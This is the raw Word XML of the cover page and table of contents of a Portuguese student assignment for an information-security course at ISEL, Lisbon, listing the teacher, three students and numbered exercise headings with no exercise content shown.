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CC6EEA" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD">
      <w:pPr>
        <w:spacing w:after="2" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1202" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk533161600"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E4F8E39" wp14:editId="5D100915">
            <wp:extent cx="3872230" cy="1257300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="53" name="Picture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223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7BC21" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8935E0" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD">
      <w:pPr>
        <w:spacing w:after="158" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E49DD5" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD">
      <w:pPr>
        <w:spacing w:after="406" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7487A47B" w14:textId="77777777" w:rsidR="00A250B4" w:rsidRDefault="002957DD" w:rsidP="00A250B4">
      <w:pPr>
        <w:spacing w:after="121" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="3620" w:right="0" w:hanging="3265"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">Instituto Superior de Engenharia </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BDF40E" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD" w:rsidP="00A250B4">
      <w:pPr>
        <w:spacing w:after="121" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="3620" w:right="0" w:hanging="3265"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>de Lisboa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4869D2" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD" w:rsidP="00A250B4">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="276" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>Engenharia Informática e de Computadores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211061A0" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="00475DDA" w:rsidP="00A250B4">
      <w:pPr>
        <w:spacing w:after="221" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="241" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C7E03C8" w14:textId="77777777" w:rsidR="00A250B4" w:rsidRDefault="002957DD" w:rsidP="00A250B4">
      <w:pPr>
        <w:spacing w:after="0" w:line="390" w:lineRule="auto"/>
        <w:ind w:left="1166" w:right="1394" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">EGURANÇA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="35"/>
        </w:rPr>
        <w:t>NFORMÁTICA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5963BC2A" w14:textId="3389467C" w:rsidR="00475DDA" w:rsidRDefault="0021416A" w:rsidP="00A250B4">
      <w:pPr>
        <w:spacing w:after="0" w:line="390" w:lineRule="auto"/>
        <w:ind w:left="1166" w:right="1394" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="002957DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="35"/>
        </w:rPr>
        <w:t>º</w:t>
      </w:r>
      <w:r w:rsidR="002957DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="002957DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="35"/>
        </w:rPr>
        <w:t>ÉRIE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62366D0D" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD">
      <w:pPr>
        <w:spacing w:after="82" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="259" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0264BC" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD">
      <w:pPr>
        <w:spacing w:after="158" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="2803" w:right="3132" w:hanging="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Docente: José Simão </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDF7868" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="277" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1B0E23" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD">
      <w:pPr>
        <w:spacing w:after="158" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="277" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FA452E" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD">
      <w:pPr>
        <w:spacing w:after="158" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="2803" w:right="3135" w:hanging="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Filipe Fé nº 42141 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373CE847" w14:textId="77777777" w:rsidR="000F1FFF" w:rsidRDefault="002957DD">
      <w:pPr>
        <w:spacing w:after="0" w:line="372" w:lineRule="auto"/>
        <w:ind w:left="2803" w:right="3069" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Inês Gomes nº 42160 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A7BB38" w14:textId="77777777" w:rsidR="00A250B4" w:rsidRDefault="002957DD">
      <w:pPr>
        <w:spacing w:after="0" w:line="372" w:lineRule="auto"/>
        <w:ind w:left="2803" w:right="3069" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">José Cunha nº 43526 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC61B80" w14:textId="77777777" w:rsidR="00A250B4" w:rsidRDefault="00A250B4">
      <w:pPr>
        <w:spacing w:after="0" w:line="372" w:lineRule="auto"/>
        <w:ind w:left="2803" w:right="3069" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A19D444" w14:textId="77777777" w:rsidR="00A250B4" w:rsidRDefault="00A250B4">
      <w:pPr>
        <w:spacing w:after="0" w:line="372" w:lineRule="auto"/>
        <w:ind w:left="2803" w:right="3069" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BF11B95" w14:textId="77777777" w:rsidR="00A250B4" w:rsidRDefault="00A250B4">
      <w:pPr>
        <w:spacing w:after="0" w:line="372" w:lineRule="auto"/>
        <w:ind w:left="2803" w:right="3069" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BBBE5AA" w14:textId="77777777" w:rsidR="00A250B4" w:rsidRDefault="00A250B4">
      <w:pPr>
        <w:spacing w:after="0" w:line="372" w:lineRule="auto"/>
        <w:ind w:left="2803" w:right="3069" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52668FFC" w14:textId="77777777" w:rsidR="00A250B4" w:rsidRDefault="00A250B4">
      <w:pPr>
        <w:spacing w:after="0" w:line="372" w:lineRule="auto"/>
        <w:ind w:left="2803" w:right="3069" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43AE9F99" w14:textId="77777777" w:rsidR="00A250B4" w:rsidRDefault="00A250B4">
      <w:pPr>
        <w:spacing w:after="0" w:line="372" w:lineRule="auto"/>
        <w:ind w:left="2803" w:right="3069" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D2D7D63" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD">
      <w:pPr>
        <w:spacing w:after="0" w:line="372" w:lineRule="auto"/>
        <w:ind w:left="2803" w:right="3069" w:hanging="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Índice </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752FF968" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD">
      <w:pPr>
        <w:spacing w:after="142" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="-6268478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C7FFEB2" w14:textId="77777777" w:rsidR="00F15358" w:rsidRDefault="00F15358">
          <w:pPr>
            <w:pStyle w:val="Cabealhodondice"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="3A99771A" w14:textId="769EF9EC" w:rsidR="00A200FD" w:rsidRDefault="00F15358">
          <w:pPr>
            <w:pStyle w:val="ndice1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8832"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:eastAsia="ja-JP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33420484" w:history="1">
            <w:r w:rsidR="00A200FD" w:rsidRPr="00CC614F">
              <w:rPr>
                <w:rStyle w:val="Hiperligao"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exercício 1</w:t>
            </w:r>
            <w:r w:rsidR="00A200FD">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00A200FD">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00A200FD">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc533420484 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00A200FD">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00A200FD">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004F32F8">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00A200FD">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C7AEA67" w14:textId="6445DC9D" w:rsidR="00A200FD" w:rsidRDefault="00A200FD">
          <w:pPr>
            <w:pStyle w:val="ndice1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8832"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:eastAsia="ja-JP"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533420485" w:history="1">
            <w:r w:rsidRPr="00CC614F">
              <w:rPr>
                <w:rStyle w:val="Hiperligao"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1)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_Toc533420485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32F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7F2F9D" w14:textId="536BD6B2" w:rsidR="00A200FD" w:rsidRDefault="00A200FD">
          <w:pPr>
            <w:pStyle w:val="ndice1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8832"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:eastAsia="ja-JP"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533420486" w:history="1">
            <w:r w:rsidRPr="00CC614F">
              <w:rPr>
                <w:rStyle w:val="Hiperligao"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2)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_Toc533420486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32F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52445E" w14:textId="1FC07B3E" w:rsidR="00A200FD" w:rsidRDefault="00A200FD">
          <w:pPr>
            <w:pStyle w:val="ndice1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8832"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:eastAsia="ja-JP"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533420487" w:history="1">
            <w:r w:rsidRPr="00CC614F">
              <w:rPr>
                <w:rStyle w:val="Hiperligao"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exercício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_Toc533420487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32F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15BC0B" w14:textId="03A22B31" w:rsidR="00A200FD" w:rsidRDefault="00A200FD">
          <w:pPr>
            <w:pStyle w:val="ndice1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8832"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:eastAsia="ja-JP"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533420488" w:history="1">
            <w:r w:rsidRPr="00CC614F">
              <w:rPr>
                <w:rStyle w:val="Hiperligao"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exercício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_Toc533420488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32F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DBC013" w14:textId="167B5BCB" w:rsidR="00A200FD" w:rsidRDefault="00A200FD">
          <w:pPr>
            <w:pStyle w:val="ndice1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8832"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:eastAsia="ja-JP"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533420489" w:history="1">
            <w:r w:rsidRPr="00CC614F">
              <w:rPr>
                <w:rStyle w:val="Hiperligao"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1)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_Toc533420489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32F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456B9" w14:textId="7E631260" w:rsidR="00A200FD" w:rsidRDefault="00A200FD">
          <w:pPr>
            <w:pStyle w:val="ndice1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8832"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:eastAsia="ja-JP"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533420490" w:history="1">
            <w:r w:rsidRPr="00CC614F">
              <w:rPr>
                <w:rStyle w:val="Hiperligao"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2)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_Toc533420490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32F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FA50F" w14:textId="52B6AACA" w:rsidR="00A200FD" w:rsidRDefault="00A200FD">
          <w:pPr>
            <w:pStyle w:val="ndice1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8832"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:eastAsia="ja-JP"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533420491" w:history="1">
            <w:r w:rsidRPr="00CC614F">
              <w:rPr>
                <w:rStyle w:val="Hiperligao"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exercício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_Toc533420491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32F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C36F3" w14:textId="023605AB" w:rsidR="00A200FD" w:rsidRDefault="00A200FD">
          <w:pPr>
            <w:pStyle w:val="ndice1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8832"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:eastAsia="ja-JP"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533420492" w:history="1">
            <w:r w:rsidRPr="00CC614F">
              <w:rPr>
                <w:rStyle w:val="Hiperligao"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2)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_Toc533420492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32F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4BD8D" w14:textId="02996675" w:rsidR="00A200FD" w:rsidRDefault="00A200FD">
          <w:pPr>
            <w:pStyle w:val="ndice1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8832"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:eastAsia="ja-JP"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533420493" w:history="1">
            <w:r w:rsidRPr="00CC614F">
              <w:rPr>
                <w:rStyle w:val="Hiperligao"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exercício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_Toc533420493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32F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48A9AE" w14:textId="5669F6F6" w:rsidR="00A200FD" w:rsidRDefault="00A200FD">
          <w:pPr>
            <w:pStyle w:val="ndice1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8832"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:eastAsia="ja-JP"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533420494" w:history="1">
            <w:r w:rsidRPr="00CC614F">
              <w:rPr>
                <w:rStyle w:val="Hiperligao"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1)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_Toc533420494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32F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A261C9" w14:textId="7C12B8EE" w:rsidR="00A200FD" w:rsidRDefault="00A200FD">
          <w:pPr>
            <w:pStyle w:val="ndice1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8832"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:eastAsia="ja-JP"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533420495" w:history="1">
            <w:r w:rsidRPr="00CC614F">
              <w:rPr>
                <w:rStyle w:val="Hiperligao"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2)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_Toc533420495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32F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E333D" w14:textId="38C8AF05" w:rsidR="00A200FD" w:rsidRDefault="00A200FD">
          <w:pPr>
            <w:pStyle w:val="ndice1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8832"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:eastAsia="ja-JP"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533420496" w:history="1">
            <w:r w:rsidRPr="00CC614F">
              <w:rPr>
                <w:rStyle w:val="Hiperligao"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exercício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_Toc533420496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32F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506F1E" w14:textId="44B06DC5" w:rsidR="00A200FD" w:rsidRDefault="00A200FD">
          <w:pPr>
            <w:pStyle w:val="ndice1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8832"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:eastAsia="ja-JP"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533420497" w:history="1">
            <w:r w:rsidRPr="00CC614F">
              <w:rPr>
                <w:rStyle w:val="Hiperligao"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1)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_Toc533420497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32F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C3C870" w14:textId="4703AF28" w:rsidR="00A200FD" w:rsidRDefault="00A200FD">
          <w:pPr>
            <w:pStyle w:val="ndice1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8832"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:eastAsia="ja-JP"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533420498" w:history="1">
            <w:r w:rsidRPr="00CC614F">
              <w:rPr>
                <w:rStyle w:val="Hiperligao"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2)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_Toc533420498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32F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867BD" w14:textId="605867F8" w:rsidR="00F15358" w:rsidRDefault="00F15358">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="46609A0C" w14:textId="77777777" w:rsidR="00000CFC" w:rsidRPr="00B95F7B" w:rsidRDefault="00000CFC" w:rsidP="00B95F7B">
      <w:pPr>
        <w:pStyle w:val="ndice3"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="030296C7" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155F10A9" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD">
      <w:pPr>
        <w:spacing w:after="0" w:line="370" w:lineRule="auto"/>
        <w:ind w:right="8779" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0ED7FE" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD">
      <w:pPr>
        <w:spacing w:after="158" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
